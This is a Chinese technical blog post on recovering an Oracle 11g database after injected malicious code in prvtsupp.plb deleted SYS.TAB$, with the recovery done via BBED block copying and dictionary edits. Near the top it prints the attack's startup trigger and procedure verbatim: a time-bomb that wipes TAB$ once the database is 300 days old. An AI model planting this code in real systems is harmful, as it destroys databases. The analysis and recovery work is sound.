點選▲關註 “資料和雲” 給公眾號標星置頂
更多精彩 第一時間直達
李翔宇,雲和恩墨西區交付技術顧問,長期服務移動運營商行業客戶,熟悉Oracle 效能最佳化,故障診斷,特殊恢復。
近期大量的客戶資料庫軟體被註入惡意程式碼,導致資料庫無法啟動,報錯ORA-00600: internal error code, arguments:[16703], [1403], [20],大致的原因和預防措施可參考下麵文章(複製開啟,或點選”閱讀原文“):
http://www.eygle.com/archives/2018/07/recover_ora-600_16703.html
大致的意思是由於惡意攻擊,$ORACLE_HOME/rdbms/admin/prvtsupp.plb被註入惡意程式碼。核心部分為一個觸發器一個儲存過程,清空了tab$,導致資料庫啟動時,bootstrap階段無法完成。
create or replace triggerDBMS_SUPPORT_DBMONITOR
after startup on database
declare
begin
DBMS_SUPPORT_DBMONITORP;
end;
/
觸發器用於啟動資料庫後呼叫DBMS_SUPPORT_DBMONITORP這個儲存過程,儲存過程程式碼如下:
PROCEDUREDBMS_SUPPORT_DBMONITORP IS
DATE1 INT :=10;
BEGIN
SELECTTO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=300)THEN
EXECUTE IMMEDIATE’create table ORACHK’||SUBSTR(SYS_GUID,10)||’ tablespace system as select *from sys.tab$’;
DELETE SYS.TAB$;
COMMIT;
EXECUTE IMMEDIATE’alter system checkpoint’;
END IF;
END;
/
該儲存過程邏輯為:判斷資料庫的建立時間是否大於 300 天,如果大於300天則ctas備份tab$之後,delete tab$。
如果有備份的話,那麼很簡單就不展開了,本文主要介紹沒備份的方法。
首先手工構造場景:
模擬DBMS_SUPPORT_DBMONITORP裡的內容
SQL> @swl
System altered.
SQL> select count(*) fromt;
COUNT(*)
———-
13982
SQL> create table t_bak as select* from tab$;
Table created.
SQL> delete from tab$;
1251 rows deleted.
SQL> commit;
Commit complete.
SQL> alter systemcheckpoint;
System altered.
SQL> shutdown abort;
ORACLE instance shut down.
此時啟動資料庫報錯ORA-00600: internal error code, arguments: [16703], [1403], [20]
SQL*Plus: Release 11.2.0.4.0Production on Wed Feb 13 04:21:27 2019
Copyright (c) 1982, 2013,Oracle. All rights reserved.
Connected to an idle instance.
SQL> startup
ORACLE instance started.
Total System Global Area 1269366784bytes
Fixed Size 2252864 bytes
Variable Size 1191186368 bytes
Database Buffers 67108864 bytes
Redo Buffers 8818688 bytes
Database mounted.
ORA-01092: ORACLE instanceterminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00600: internal errorcode, arguments: [16703], [1403], [20], [], [], [],
[], [], [], [], [], []
Process ID: 3255
Session ID: 125 Serial number:5
恢復思路:
由於有且僅有tab$被delete,所以如果能恢復tab$的資料則資料庫將得以恢復,這裡我想到的大致恢復方法如下(歡迎大家提供更多的恢復思路):
- 根據dump redo可以找到tab$被delete的rdba以及具體條目,使用bbed逐一還原(此方法非常麻煩,如果該庫的表特別多,會增加更多工作量)。
- 由於惡意程式碼中,delete tab$前,ctas了一份tab$的備份,可以嘗試先open資料庫,再根據備份的tab$ insert到tab$中(此方法相對比較方便)。
- odu抽取資料,重建庫(如果庫特別大,比如好幾個t,甚至10t,100t的庫則耗時太長)
本文只介紹第二種比較方便的方法,
恢復步驟大致如下:
-
open資料庫
-
根據備份的tab$ insert到tab$中
在恢復之前首先簡單介紹一下tab$,tab$是cluster C_OBJ#中的一個table,CLUSTER KEY為OBJ#,C_OBJ#中還包括有ICOL$、IND$、COL$、CLU$、I_OBJ#、COLTYPE$等等bootstrap核心物件,tab$在資料庫中是非常核心的一個基表,它記錄了table的段頭地址以及統計資訊。在資料庫open過程中,需要訪問到的基表物件如果在tab$中不存在,則資料庫將無法open,報錯即為ORA-00600:internal error code, arguments: [16703], [1403], [xxx]。
CREATE CLUSTERC_OBJ#(“OBJ#” NUMBER) PCTFREE 5 PCTUSED 40 INITRANS 2 MAXTRANS 255 STORAGE( INITIAL 136K NEXT 200K MINEXTENTS 1 MAXEXTENTS2147483645 PCTINCREASE 0 OBJNO 2 EXTENTS (FILE 1 BLOCK 144))
SIZE 800
CREATE TABLE TAB$(“OBJ#”NUMBER NOT NULL,”DATAOBJ#” NUMBER,”TS#” NUMBER NOT NULL,”FILE#”NUMBER NOT NULL,”BLOCK#” NUMBER NOT NULL,”BOBJ#” NUMBER,”TAB#”NUMBER,”COLS” NUMBER NOT NULL,”CLUCOLS” NUMBER,”
PCTFREE$” NUMBERNOT NULL,”PCTUSED$” NUMBER NOT NULL,”INITRANS” NUMBER NOT NULL,”MAXTRANS”NUMBER NOT NULL,”FLAGS” NUMBER NOT NULL,”AUDIT$” VARCHAR2(38)NOT NULL,”ROWCNT” NUMBER,”BLKCNT” NUMBER,”EMPCNT”NUMBER,”AVGSPC” NUMBER,”CHNCNT” NUMBER,”AVGRLN” NUMBER,”AVGSPC_FLB”NUMBER,”FLBCNT” NUMBER,”ANALYZETIME” DATE,”SAMPLESIZE”NUMBER,”DEGREE” NUMBER,”INSTANCES” NUMBER,”INTCOLS”NUMBER NOT NULL,”KERNE
LCOLS” NUMBERNOT NULL,”PROPERTY” NUMBER NOT NULL,”TRIGFLAG” NUMBER,”SPARE1″NUMBER,”SPARE2″ NUMBER,”SPARE3″ NUMBER,”SPARE4″VARCHAR2(1000),”SPARE5″ VARCHAR2(1000),”SPARE6″ DATE) STORAGE( OBJNO 4 TABNO 1) CLUSTER C_OBJ#(OBJ#)
如何open資料庫?
知道了在資料庫open過程中,需要訪問到的基表物件如果在tab$中不存在將報錯ORA-00600: internal error code, arguments:[16703], [1403], [xxx],那麼將這些物件的資訊還原回tab$,則資料庫將open成功。
如何確定資料庫open需要訪問哪些核心基表呢?
找一個正常的資料庫做open時的10046,過程如下:
SQL> startupmount;
ORACLE instancestarted.
Total SystemGlobal Area 1269366784 bytes
Fixed Size 2252864 bytes
Variable Size 754978752 bytes
DatabaseBuffers 503316480 bytes
Redo Buffers 8818688 bytes
Database mounted.
SQL> @46on
Statementprocessed.
Statementprocessed.
SQL> alter databaseopen;
Database altered.
SQL> @46off
/u01/app/oracle/diag/rdbms/test/test/trace/test_ora_1769.trc
Statementprocessed.
簡單的對10046 trace檔案進行篩選則可以找到這些基表的obj#,併在一臺同平臺同版本的資料庫上查詢這些物件的rdba地址以及其他資訊
[oracle@test ~]$grep “TABLE ACCESS”/u01/app/oracle/diag/rdbms/test/test/trace/test_ora_1769.trc|awk ‘{print$7}’|sort|uniq|sed ‘s/obj=/,/’|awk ‘{printf $1}’|sed ‘s/^,//’
10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,6571,6731,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99
SQL> SELECT a.OBJ#,TAB#,a.DATAOBJ#,BOBJ#,NAME,DBMS_ROWID.ROWID_RELATIVE_FNO(a.ROWID)FILE_ID,DBMS_ROWID.ROWID_BLOCK_NUMBER(a.ROWID) BLOCK_ID
2 FROMTAB$ a,obj$ b
3 WHEREa.obj#=b.obj#
4 ANDA.OBJ# IN (10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99)
5 orderby 6,7;
這些物件在同版本同平臺的資料庫上的rdba地址一般都是一致的,所以找一臺正常執行的同版本同平臺的資料庫(最好是比較乾凈的庫,否則後續處理會比較麻煩),使用bbed進行替換,用sql拼接出bbed的命令
SQL> SELECT DISTINCT’copy file 2 block ‘||block_id||’ to file ‘||FILE_ID||’ block ‘||BLOCK_ID FROM(
2 SELECTa.OBJ#,TAB#,a.DATAOBJ#,BOBJ#,NAME,DBMS_ROWID.ROWID_RELATIVE_FNO(a.ROWID)FILE_ID,DBMS_ROWID.ROWID_BLOCK_NUMBER(a.ROWID) BLOCK_ID
3 FROMTAB$ a,obj$ b
4 WHEREa.obj#=b.obj#
5 ANDA.OBJ# IN (10,101,103,104,105,118,12939,1297,12973,1300,13003,1302,1304,13059,1306,1307,1309,1314,13273,13298,13604,14,14137,15,16,160,161,17,18,19,192,2,20,21,22,221,225,226,227,228,23,25,252,28,29,294,297,300,301,302,304,307,31,311,32,390,4,433,436,438,446,448,451,453,455,463,5,506,514,515,517,5541,5582,567,5780,5794,5797,5804,5814,587,59,6,61,69,713,7144,717,721,74,8,80,83,86,88,92,95,98,99));
可以看到這裡需要替換38個資料塊,替換後可以成功open資料庫
嘗試open資料庫:SQL> conn / as sysdba
Connected to anidle instance.
SQL> startup
ORACLE instancestarted.
Total System GlobalArea 1269366784 bytes
Fixed Size 2252864 bytes
Variable Size 1191186368 bytes
DatabaseBuffers 67108864 bytes
Redo Buffers 8818688 bytes
Database mounted.
Database opened.
從alert日誌可以看到此時資料庫open伴隨著ora-7445,並且5分鐘後就會crash掉,所以要抓緊著5分鐘的操作時間
如何將備份的tab$insert回tab$?
由於tab$的備份表在tab$中並沒有恢復所以無法查詢,下麵需要根據redodump去確定tab$的備份表t_bak的rdba
SQL> desc t_bak
ERROR:
ORA-03113: end-of-fileon communication channel
Process ID: 2812
Session ID: 125 Serialnumber: 7
透過對logdump搜尋OBJ:2(C_OBJ#的dataobj#)、OP:11.2(insert操作)、tabn:1(C_OBJ#中tab$的tab#),以及查出來的t_bak的obj#,不難找到create table as t_bak對tab$的redo日誌:
CHANGE #2 TYP:2CLS:1 AFN:1 DBA:0x00407b2c OBJ:2 SCN:0x0000.000f5a8b SEQ:1 OP:11.2 ENC:0 RBL:0KTBRedo
op: 0x11 ver: 0x01
compat bit: 4(post-11) padding: 1
op: F xid: 0x0004.00f.0000011e uba: 0x00c00630.0050.37
Block cleanout record,scn: 0x0000.000f5a8b ver: 0x01 opt: 0x02,entries follow…
itli: 1 flg: 2 scn: 0x0000.000f5a8b
KDO Op code: IRP rowdependencies Disabled
xtype: XA flags: 0x00000000 bdba: 0x00407b2c hdba: 0x00400090
itli: 2 ispac: 0 maxfr: 4863
tabn: 1 slot: 2(0x2)size/delt: 123
fb: -CH-FL– lb:0x2 cc: 36 cki: 0
null:
01234567890123456789012345678901234567890123456789012345678901234567890123456789
可以看到t_bak在tab$的rdba地址為0x00407b2c(file1 block 31532),cki為0即cluster key為kdbr[0]
與redo dump一致,下麵開始恢復tab$中t_bak的記錄,由於是cluster block所以過程有點繁瑣
t_bak已經恢復完成,下麵insert回tab$
SQL> insert intotab$ select * from (select * from t_bak where obj# in (select obj# from t_bak whereobj#<>14751 minus select obj# from tab$));
982 rows created.
SQL> commit;
Commit complete.
SQL> select count(*)from t;
COUNT(*)
———-
13982
至此資料庫基本恢復完成。
但是透過hcheck指令碼檢查資料字典一致性發現還是有一些問題存在:
SQL> @hcheck
HCheck Version07MAY18 on 14-FEB-2019 22:49:53
———————————————-
Catalog Version11.2.0.4.0 (1102000400)
db_name: LXY
Catalog Fixed
ProcedureName Version Vs Release Timestamp
Result
——————————… ———- — ———- ————–
——
.-LobNotInObj … 1102000400<= *All Rel* 02/14 22:49:53 PASS
.-MissingOIDOnObjCol … 1102000400<= *All Rel* 02/14 22:49:53 FAIL
HCKE-0002: Object typecolumn with missing OID$ (Doc ID 1360268.1)
OBJ#=12946 Name=SYS.AQ$SCHEDULER$_EVENT_QTABIntCol#=20=USER_DATA TabProp=
OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=28=USER_DATA
TabProp=539101206
OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=31=SYS_NC00031$
TabProp=539101206
OBJ#=12953 Name=SYS.SCHEDULER$_REMDB_JOBQTABIntCol#=46=SYS_NC00046$
TabProp=539101206
OBJ#=12987 Name=SYS.SCHEDULER_FILEWATCHER_QTIntCol#=28=USER_DATA
TabProp=539101190
OBJ#=12987 Name=SYS.SCHEDULER_FILEWATCHER_QTIntCol#=35=SYS_NC00035$
TabProp=539101190
OBJ#=13273 Name=SYS.AQ_EVENT_TABLEIntCol#=25=USER_DATA TabProp=539363346
OBJ#=13281 Name=SYS.AQ$AQ_EVENT_TABLEIntCol#=20=USER_DATA TabProp=
OBJ#=13282 Name=SYS.AQ$_AQ_EVENT_TABLE_FIntCol#=24=USER_DATA TabProp=
OBJ#=13285 Name=SYS.AQ_PROP_TABLEIntCol#=28=USER_DATA TabProp=539101186
OBJ#=13591 Name=SYS.SYS$SERVICE_METRICS_TABIntCol#=28=USER_DATA
TabProp=539101186
發現了11處問題,都是HCKE-0002:Object type column with missing OID$。這是什麼意思呢?
分析hcheck指令碼的MissingOIDOnObjCol儲存過程:
Procedure MissingOIDOnObjCol
(nF In Number Default 0,
VerChk In Number Default 5,
Verbose In Boolean Default FALSE)
Is
nFr Number ;
Cursor sCur1 Is
Select o.obj# , o.type#, o.owner#,o.name, c.col#, c.intcol#,
c.name cname, t.property
From obj$ o, col$ c, coltype$ ct, oid$ oi, tab$ t
Where o.obj# = ct.obj#
And ct.obj# = c.obj#
And ct.col# = c.col#
And ct.intcol# = c.intcol#
And oi.oid$(+) = ct.toid
And o.obj# = t.obj#(+)
And oi.oid$ is null;
ps1 Varchar2(10) := ‘HCKE-0002’;
ps1a Varchar2(65) := ‘Object type columnwith missing OID ps1n Varchar2(40) := ‘(Doc ID 1360268.1)’;
CursorRun Boolean := FALSE;
Begin
If ( nF = 0) Then
nFr := FindFname(‘MissingOIDOnObjCol’) ; Else nFr :=nF;
End If ;
If ChecknCatVnFR (nCatV, nFr, VerChk) = FALSE Then Return;End If;
For c1 In sCur1 Loop
If (not CursorRun) Then
report_failure(‘FAIL’,ps1,ps1a,ps1n,CursorRun);
End If;
put_line(‘ OBJ#=’||c1.obj#||’Name=’||Owner(c1.owner#)||’.’
||c1.name||’IntCol#=’||c1.intcol#||’=’||c1.cname
||’TabProp=’||c1.property);
Fatal := Fatal + 1 ;
End Loop ;
If (CursorRun) Then put(chr(10)) ; else put_line(‘PASS’);End If ;
End ;
仔細對指令碼進行分析,推測是當表的欄位型別為type型別的物件時,coltype$的toid和oid$的oid$不匹配導致的,應該是之前為了open資料庫替換塊的時候造成的。
以OBJ#=12946Name=SYS.AQ$SCHEDULER$_EVENT_QTAB IntCol#=20=USER_DATA為例繼續分析:
由於資料字典不一致,該表是不可以正常訪問:
SQL> desc SYS.AQ$SCHEDULER$_EVENT_QTAB
ERROR:
ORA-00600: internal error code, arguments:[16687], [12946], [20], [], [], [], [], [], [], [], [], []
SQL> select * fromSYS.AQ$SCHEDULER$_EVENT_QTAB;
select *from SYS.AQ$SCHEDULER$_EVENT_QTAB
*
ERROR atline 1:
ORA-21700: object does not exist or is marked fordelete
對正常的資料庫查詢可以看的SYS.AQ$SCHEDULER$_EVENT_QTAB的欄位名為USER_DATA的欄位型別為SCHEDULER$_EVENT_INFO,透過下麵的查詢可以發現確實不匹配(以oid$的為準,因為之前替換的是C_OBJ#,而coltype$是C_OBJ#中的一個表):
SQL> select oid$ from oid$ where obj# in (selectobj# from obj$ where name=’SCHEDULER$_EVENT_INFO’);
OID$
——————————–
7BB17EE961D00845E0536438A8C00848
SQL> select toid from coltype$ where obj# in(select obj# from obj$ where name=’AQ$SCHEDULER$_EVENT_QTAB’) and intcol#=20;
TOID
——————————–
81673B4EDDF5111FE0536438A8C02F5D
透過下麵的查詢也可以推出以oid$的為準
SQL> select toid from type$ where toid in(‘7BB17EE961D00845E0536438A8C00848′,’81673B4EDDF5111FE0536438A8C02F5D’);
TOID
——————————–
7BB17EE961D00845E0536438A8C00848
修改coltype$後恢復正常:
SQL> update coltype$ set toid=’7BB17EE961D00845E0536438A8C00848’where obj# in (select obj# from obj$ where name=’AQ$SCHEDULER$_EVENT_QTAB’) andintcol#=20;
1 row updated.
SQL> commit;
Commit complete.
SQL> @flc
System altered.
System altered.
SQL> select * fromAQ$SCHEDULER$_EVENT_QTAB;
no rows selected
逐一修改後,再次執行hcheck:
SQL> @hcheck
HCheck Version07MAY18 on 15-FEB-2019 01:56:00
———————————————-
Catalog Version11.2.0.4.0 (1102000400)
db_name: LXY
15-FEB-2019 01:56:01 Elapsed: 1 secs
—————————————
Found 0 potentialproblem(s) and 0 warning(s)
PL/SQL proceduresuccessfully completed.
Statementprocessed.
至此整個資料庫比較完整的恢復完畢。